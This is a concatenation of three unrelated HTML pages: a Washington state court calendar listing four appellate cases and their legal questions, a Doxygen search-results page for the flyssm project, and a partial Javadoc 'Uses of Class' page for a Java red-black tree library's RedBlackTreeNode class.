<TABLE BORDER=1 CELLPADDING=5 CELLSPACING=0 WIDTH=100%>
<tr>
<td width="50%" valign="top"><b>Case No. 1 - 64501-9</b></td>
<td width="50%" valign="top"><b><u>Counsel</u></b></td>
</tr>
<tr>
<td width="50%" valign="top">
Rommel J. Freitag, et ux.<br>
v.<br>
Frank W. McGhie, et ux., et al.
</td>
<td width="50%" valign="top">
Laurence Severance<BR>
<BR>
Lois Meltzer<BR>
David Metcalf
</td>
</tr>
</TABLE>
<b>Whether the statute of limitations on an action to set aside a fraudulent transfer (RCW 19.40.091) begins to run when the plaintiff first discovers the transfer, or when the plaintiff first discovers the facts constituting the fraud.</b>
<P>
<TABLE BORDER=1 CELLPADDING=5 CELLSPACING=0 WIDTH=100%>
<tr>
<td width="50%" valign="top"><b>Case No. 2 - 64564-7</b></td>
<td width="50%" valign="top"><b><u>Counsel</u></b></td>
</tr>
<tr>
<td width="50%" valign="top">
Clyde Ross, et ux.<br>
v.<br>
State Farm Mutual Automobile Insurance Company
</td>
<td width="50%" valign="top">
Kenneth Isserlis<BR>
<BR>
William Hickman & Danielle Hess
</td>
</tr>
</TABLE>
Whether a Washington resident, a wife, injured in Washington while driving a vehicle insured in the marital couple's name and registered in the husband's name in Montana, may recover UIM benefits under a policy covering another automobile registered and insured in her name in Washington?
<P>
<hr noshade>
<p>
<B>1:30 P.M.</B>
<p>
<TABLE BORDER=1 CELLPADDING=5 CELLSPACING=0 WIDTH=100%>
<tr>
<td width="50%" valign="top"><b>Case No. 3 - 64512-4</b></td>
<td width="50%" valign="top"><b><u>Counsel</u></b></td>
</tr>
<tr>
<td width="50%" valign="top">
Ken Nivens<br>
v.<br>
7-11 Hoagy’s Corner, et al.
</td>
<td width="50%" valign="top">
Samuel Pemberton<BR>
<BR>
John Moore
</td>
</tr>
</TABLE>
<b>Does a business have a special relationship with its customers requiring the business to maintain a safe premises?</b>
<P>
<TABLE BORDER=1 CELLPADDING=5 CELLSPACING=0 WIDTH=100%>
<tr>
<td width="50%" valign="top"><b>Case No. 4 - 64704-6</b></td>
<td width="50%" valign="top"><b><u>Counsel</u></b></td>
</tr>
<tr>
<td width="50%" valign="top">
Toni Rae Guard, Jeffrey King Beeston, Sr.<br>
v.<br>
John Jackson, et ux.
</td>
<td width="50%" valign="top">
Eugene Bolin, Jr. & Matthew Dubin<BR>
<BR>
John Belcher
</td>
</tr>
</TABLE>
<b>Does RCW 4.24.010 unconstitutionally discriminate between the sexes in violation of the Equal Rights Amendment (Const. art. XXXI, § 1) in requiring the father, but not the mother, to regularly contribute to his illegitimate child's support in order to have a cause of action for the wrongful death of that child?</b>
<P>
<hr noshade>
<P>
<b>These summaries are not formulated by the Court and are provided for the convenience of the public only.</b>
</BODY>
<p>
</html> </td>
<td width="10"> </td>
</tr>
</table>
<div class="footerOuter">
<div class="footerBg">
<div class="footerLayout">
<ul>
<span class="footerHeader">Access Records</span>
<li><a href="/jislink/">JIS LINK</a></li>
<li><a href="http://dw.courts.wa.gov?fa=home.fmcd">Find Your Court Date</a></li>
<li><a href="http://dw.courts.wa.gov">Search Case Records</a></li>
<li><a href="/newsinfo/publication/?fa=newsinfo_publication.recordsRequest">Records Request</a></li>
<li><a href="/jis/">Judicial Info System (JIS)</a></li>
<li><a href="https://odysseyportal.courts.wa.gov/odyportal">Odyssey Portal</a></li>
<li><a href="/caseload">Caseload Reports</a></li>
<li>
</li>
</ul>
<ul>
<span class="footerHeader">Find Resources</span>
<li><a href="/library/">State Law Library</a></li>
<li><a href="/education/">Civic Learning</a></li>
<li><a href="/newsinfo/index.cfm?fa=newsinfo.displayContent&theFile=content/ResourcesPubsReports">Resources, Publications, & Reports</a></li>
<li><a href="/committee/?fa=committee.home&committee_id=143">Court Program Accessibility (ADA)</a></li>
<li><a href="/newsinfo/resources/">Jury Service Information</a></li>
<li><a href="/Whistleblower/">Whistleblower</a></li>
<li><a href="/employ/">Employment</a></li>
<li><a href="/procure/">Procurement</a></li>
</ul>
<ul>
<span class="footerHeader">From the Courts</span>
<li><a href="/forms/">Court Forms</a></li>
<li><a href="/forms/?fa=forms.contribute&formID=16">Domestic Violence Forms</a></li>
<li><a href="/opinions/">Court Opinions</a></li>
<li><a href="/court_rules/">Court Rules</a></li>
<li><a href="/index.cfm?fa=home.contentDisplay&location=PatternJuryInstructions">Pattern Jury Instructions</a></li>
<li><a href="/emergency/">Emergency Procedures</a></li>
<li><a href="/index.cfm?fa=home.courtClosures">Notice of Court Closures</a></li>
</ul>
<ul>
<span class="footerHeader">Get Organizational Information</span>
<li><a href="/appellate_trial_courts/aocwho/">Administrative Office of the Courts</a></li>
<li><a href="/appellate_trial_courts/SupremeCourt/?fa=supremecourt.welcome">Supreme Court</a></li>
<li><a href="/appellate_trial_courts/">Appellate & Trial Courts</a></li>
<li><a href="/programs_orgs/">Programs & Organizations</a></li>
<li><a href="/newsinfo/">Washington Court News</a></li>
<li><a href="/court_dir/">Court Directory</a></li>
</ul>
</div>
</div>
</div>
</div>
<div class="stayConnected">
<ul style="float:left;">
<li><span class="stayConnectedHeader">Connect with us</span></li>
<li><a href="https://www.facebook.com/washingtoncourts"><img src="/images/iconFB_gray.png" alt="Find us on Facebook" border="0" /></a></li>
<li><a href="https://twitter.com/WACourts"><img src="/images/iconTwitter_gray.png" alt="Follow us on Twitter" border="0" /></a></li>
<li><a href="http://www.youtube.com/channel/UCx4B3hu7aZGPnYGKwph2M0w"><img src="/images/iconYT_gray.png" alt="Watch our YouTube Channel" border="0" /></a></li>
<li><a href="/notifications/?fa=notifications.rss"><img src="/images/iconRss_gray.png" alt="Use one of our RSS Feeds" border="0" /></a></li>
</ul>
<ul style="float:left; padding: 0 0 0 24px;">
<li><span class="stayConnectedHeader">Need Help?</span></li>
<li><a href="https://aoc.custhelp.com/"><img src="/images/iconHelp_lg.png" border="0"></a></li>
<li><span class="stayConnectedHeader"><a href="https://aoc.custhelp.com/">FAQs & eService Center</a></span></li>
</ul>
</div>
<div class="footerLower">
<ul>
<li class="footerText" style="float:left;"><a href="/?fa=home.notice">Privacy & Disclaimer Notices</a> | <a href="/index.cfm?fa=home.sitemap">Sitemap</a></li>
<li class="sealPos"><img src="/images/footerSeal.png" alt="WA State Seal" ></li>
<li class="footerText" style="float:right;">Copyright AOC © 2014</li>
</ul>
</div>
<div class="accessWA">
<div style="display:inline; padding:0 12px 0 8px;float:left;"><a href="http://access.wa.gov" target="_blank"><img src="/images/AWlogo2_150px.gif" border="0" /></a></div>
<div style="display:inline; padding:8px 0;float:left;">For Washington State laws, visit the <a href="http://www1.leg.wa.gov/Legislature/" class="external" target="_blank" style="text-decoration:underline;">Washington State Legislature</a></div>
<div style="display:inline; padding:8px 0;float:right; font-size:8px">S3</div>
</div>
</div>
</div>
</body>
</html> |
trunk/doc/html/search/classes_6e.html | cicinsain/flyssm | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title></title>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<link rel="stylesheet" type="text/css" href="search.css"/>
<script type="text/javascript" src="search.js"></script>
</head>
<body class="SRPage">
<div id="SRIndex">
<div class="SRStatus" id="Loading">Loading...</div>
<div class="SRResult" id="SR_narrptr">
<div class="SREntry">
<a id="Item0" onkeydown="return searchResults.Nav(event,0)" onkeypress="return searchResults.Nav(event,0)" onkeyup="return searchResults.Nav(event,0)" class="SRSymbol" href="../structNArrPtr.html" target="_parent">NArrPtr</a>
</div>
</div>
<div class="SRResult" id="SR_nucstate">
<div class="SREntry">
<a id="Item1" onkeydown="return searchResults.Nav(event,1)" onkeypress="return searchResults.Nav(event,1)" onkeyup="return searchResults.Nav(event,1)" class="SRSymbol" href="../structNucState.html" target="_parent">NucState</a>
</div>
</div>
<div class="SRResult" id="SR_nucstatetype">
<div class="SREntry">
<a id="Item2" onkeydown="return searchResults.Nav(event,2)" onkeypress="return searchResults.Nav(event,2)" onkeyup="return searchResults.Nav(event,2)" class="SRSymbol" href="../structNucStateType.html" target="_parent">NucStateType</a>
</div>
</div>
<div class="SRStatus" id="Searching">Searching...</div>
<div class="SRStatus" id="NoMatches">No Matches</div>
<script type="text/javascript"><!--
document.getElementById("Loading").style.display="none";
document.getElementById("NoMatches").style.display="none";
var searchResults = new SearchResults("searchResults");
searchResults.Search();
--></script>
</div>
</body>
</html>
|
doc/org/altervista/scarrozzo/redblacktree/rbtclasses/class-use/RedBlackTreeNode.html | scarrozzo/JRedBlackTree | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="it">
<head>
<!-- Generated by javadoc (1.8.0_91) on Thu Aug 18 23:26:28 CEST 2016 -->
<title>Uses of Class org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode</title>
<meta name="date" content="2016-08-18">
<link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/package-summary.html">Package</a></li>
<li><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?org/altervista/scarrozzo/redblacktree/rbtclasses/class-use/RedBlackTreeNode.html" target="_top">Frames</a></li>
<li><a href="RedBlackTreeNode.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode" class="title">Uses of Class<br>org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="org.altervista.scarrozzo.redblacktree.rbtclasses">
<!-- -->
</a>
<h3>Uses of <a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a> in <a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/package-summary.html">org.altervista.scarrozzo.redblacktree.rbtclasses</a></h3>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/package-summary.html">org.altervista.scarrozzo.redblacktree.rbtclasses</a> that return <a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="type parameter in RedBlackTreeNode">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTreeNode.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html#getLeftChild--">getLeftChild</a></span>()</code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTree.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html#getMaxNode--">getMaxNode</a></span>()</code>
<div class="block">Get the tree maximum starting from the root node</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTree.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html#getMaxNodeStartingFrom-org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode-">getMaxNodeStartingFrom</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>> startingNode)</code>
<div class="block">Get the tree maximum starting from a given node</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTree.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html#getMinNode--">getMinNode</a></span>()</code>
<div class="block">Get the tree minimum starting from the root node</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTree.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html#getMinNodeStartingFrom-org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode-">getMinNodeStartingFrom</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>> startingNode)</code>
<div class="block">Get the tree minimum starting from a given node</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="type parameter in RedBlackTreeNode">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTreeNode.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html#getParent--">getParent</a></span>()</code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="type parameter in RedBlackTreeNode">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTreeNode.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html#getRightChild--">getRightChild</a></span>()</code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTree.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html#search-T-">search</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a> key)</code>
<div class="block">Search the node with the key equals to the key parameter</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTree.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html#treePredecessor-org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode-">treePredecessor</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>> node)</code>
<div class="block">Find the predecessor of a given node</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTree.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html#treeSuccessor-org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode-">treeSuccessor</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>> node)</code>
<div class="block">Find the successor of a given node</div>
</td>
</tr>
</tbody>
</table>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/package-summary.html">org.altervista.scarrozzo.redblacktree.rbtclasses</a> with parameters of type <a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTree.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html#delete-org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode-">delete</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>> node)</code>
<div class="block">Delete a node</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTree.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html#getMaxNodeStartingFrom-org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode-">getMaxNodeStartingFrom</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>> startingNode)</code>
<div class="block">Get the tree maximum starting from a given node</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTree.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html#getMinNodeStartingFrom-org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode-">getMinNodeStartingFrom</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>> startingNode)</code>
<div class="block">Get the tree minimum starting from a given node</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTreeNode.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html#setLeftChild-org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode-">setLeftChild</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="type parameter in RedBlackTreeNode">T</a>> childLeft)</code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTreeNode.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html#setParent-org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode-">setParent</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="type parameter in RedBlackTreeNode">T</a>> parent)</code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTreeNode.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html#setRightChild-org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode-">setRightChild</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="type parameter in RedBlackTreeNode">T</a>> childRight)</code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTree.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html#treePredecessor-org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode-">treePredecessor</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>> node)</code>
<div class="block">Find the predecessor of a given node</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>></code></td>
<td class="colLast"><span class="typeNameLabel">RedBlackTree.</span><code><span class="memberNameLink"><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html#treeSuccessor-org.altervista.scarrozzo.redblacktree.rbtclasses.RedBlackTreeNode-">treeSuccessor</a></span>(<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">RedBlackTreeNode</a><<a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTree.html" title="type parameter in RedBlackTree">T</a>> node)</code>
<div class="block">Find the successor of a given node</div>
</td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/package-summary.html">Package</a></li>
<li><a href="../../../../../../org/altervista/scarrozzo/redblacktree/rbtclasses/RedBlackTreeNode.html" title="class in org.altervista.scarrozzo.redblacktree.rbtclasses">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?org/altervista/scarrozzo/redblacktree/rbtclasses/class-use/RedBlackTreeNode.html" target="_top">Frames</a></li>
<li><a href="RedBlackTreeNode.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
